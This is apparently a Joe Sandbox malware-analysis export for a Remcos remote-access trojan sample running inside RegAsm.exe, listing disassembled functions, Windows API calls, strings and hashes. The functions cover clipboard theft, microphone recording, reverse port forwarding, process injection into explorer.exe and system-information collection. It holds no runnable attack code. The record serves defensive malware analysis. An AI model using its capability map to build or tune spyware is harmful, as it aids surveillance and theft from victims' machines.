                                                          • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                          • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                          • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                          • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                          • __alloca_probe_16.LIBCMT ref: 00453F94
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                          • __freea.LIBCMT ref: 00454003
                                                          • __freea.LIBCMT ref: 0045400F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                          • String ID: \@E
                                                          • API String ID: 201697637-1814623452
                                                          • Opcode ID: 6b713b73fa418151b2ceeed66ebddf9bdcb7dc27971baa6073fd327f22c08990
                                                          • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                          • Opcode Fuzzy Hash: 6b713b73fa418151b2ceeed66ebddf9bdcb7dc27971baa6073fd327f22c08990
                                                          • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: \&G$\&G$`&G
                                                          • API String ID: 269201875-253610517
                                                          • Opcode ID: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                                          • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                          • Opcode Fuzzy Hash: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                                          • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 65535$udp
                                                          • API String ID: 0-1267037602
                                                          • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                          • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                          • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                          • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                          • __dosmaperr.LIBCMT ref: 0043A8A6
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                          • __dosmaperr.LIBCMT ref: 0043A8E3
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                          • __dosmaperr.LIBCMT ref: 0043A937
                                                          • _free.LIBCMT ref: 0043A943
                                                          • _free.LIBCMT ref: 0043A94A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                          • String ID:
                                                          • API String ID: 2441525078-0
                                                          • Opcode ID: 019acc7a2e3de953c23e11cafa5877634505dff612e887b7d59a77d89ef25481
                                                          • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                          • Opcode Fuzzy Hash: 019acc7a2e3de953c23e11cafa5877634505dff612e887b7d59a77d89ef25481
                                                          • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                          • TranslateMessage.USER32(?), ref: 0040557E
                                                          • DispatchMessageA.USER32(?), ref: 00405589
                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                          • API String ID: 2956720200-749203953
                                                          • Opcode ID: 4e0681f4e841589ff8d14249d1ce1c9e820fa709ca7ac62b458806707e88a85a
                                                          • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                          • Opcode Fuzzy Hash: 4e0681f4e841589ff8d14249d1ce1c9e820fa709ca7ac62b458806707e88a85a
                                                          • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                          APIs
                                                            • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                          • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                          • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                          • String ID: 0VG$0VG$<$@$Temp
                                                          • API String ID: 1704390241-2575729100
                                                          • Opcode ID: 62621946d8eb1aa2ce2b39a4af5520ae479f7c91f66b5ded83c662c0635c4b6b
                                                          • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                          • Opcode Fuzzy Hash: 62621946d8eb1aa2ce2b39a4af5520ae479f7c91f66b5ded83c662c0635c4b6b
                                                          • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 00416941
                                                          • EmptyClipboard.USER32 ref: 0041694F
                                                          • CloseClipboard.USER32 ref: 00416955
                                                          • OpenClipboard.USER32 ref: 0041695C
                                                          • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                          • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                          • CloseClipboard.USER32 ref: 00416984
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                          • String ID: !D@
                                                          • API String ID: 2172192267-604454484
                                                          • Opcode ID: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
                                                          • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                          • Opcode Fuzzy Hash: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
                                                          • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                          • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                          • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                          • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                          APIs
                                                          • _free.LIBCMT ref: 00448135
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00448141
                                                          • _free.LIBCMT ref: 0044814C
                                                          • _free.LIBCMT ref: 00448157
                                                          • _free.LIBCMT ref: 00448162
                                                          • _free.LIBCMT ref: 0044816D
                                                          • _free.LIBCMT ref: 00448178
                                                          • _free.LIBCMT ref: 00448183
                                                          • _free.LIBCMT ref: 0044818E
                                                          • _free.LIBCMT ref: 0044819C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                          • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                          • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                          • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                          APIs
                                                          • _free.LIBCMT ref: 100059EA
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 100059F6
                                                          • _free.LIBCMT ref: 10005A01
                                                          • _free.LIBCMT ref: 10005A0C
                                                          • _free.LIBCMT ref: 10005A17
                                                          • _free.LIBCMT ref: 10005A22
                                                          • _free.LIBCMT ref: 10005A2D
                                                          • _free.LIBCMT ref: 10005A38
                                                          • _free.LIBCMT ref: 10005A43
                                                          • _free.LIBCMT ref: 10005A51
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                          • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                          • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                          • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Eventinet_ntoa
                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                          • API String ID: 3578746661-3604713145
                                                          • Opcode ID: b0b6dcaede0a5adf9c5b96f0b4e809d1309e3a965782396cd2d372e65062e622
                                                          • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                          • Opcode Fuzzy Hash: b0b6dcaede0a5adf9c5b96f0b4e809d1309e3a965782396cd2d372e65062e622
                                                          • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                          APIs
                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DecodePointer
                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                          • API String ID: 3527080286-3064271455
                                                          • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                          • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                          • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                          • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                          • Sleep.KERNEL32(00000064), ref: 00417521
                                                          • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                          • API String ID: 1462127192-2001430897
                                                          • Opcode ID: f8410daf8611d6dd58e1b86e5ccb1e64fac469e803ba3f11ccb0ef9c9bbe0734
                                                          • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                          • Opcode Fuzzy Hash: f8410daf8611d6dd58e1b86e5ccb1e64fac469e803ba3f11ccb0ef9c9bbe0734
                                                          • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProcess
                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                          • API String ID: 2050909247-4242073005
                                                          • Opcode ID: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                          • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                          • Opcode Fuzzy Hash: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                          • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                          APIs
                                                          • _strftime.LIBCMT ref: 00401D50
                                                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                          • API String ID: 3809562944-243156785
                                                          • Opcode ID: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
                                                          • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                          • Opcode Fuzzy Hash: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
                                                          • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                          • int.LIBCPMT ref: 00410E81
                                                            • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                            • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                          • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                          • __Init_thread_footer.LIBCMT ref: 00410F29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                          • String ID: ,kG$0kG
                                                          • API String ID: 3815856325-2015055088
                                                          • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                          • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                          • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                          • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                          • waveInStart.WINMM ref: 00401CFE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                          • String ID: dMG$|MG$PG
                                                          • API String ID: 1356121797-532278878
                                                          • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                          • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                          • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                          • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                            • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                                            • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                                            • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                          • TranslateMessage.USER32(?), ref: 0041D4E9
                                                          • DispatchMessageA.USER32(?), ref: 0041D4F3
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                                          Memory Dump Source
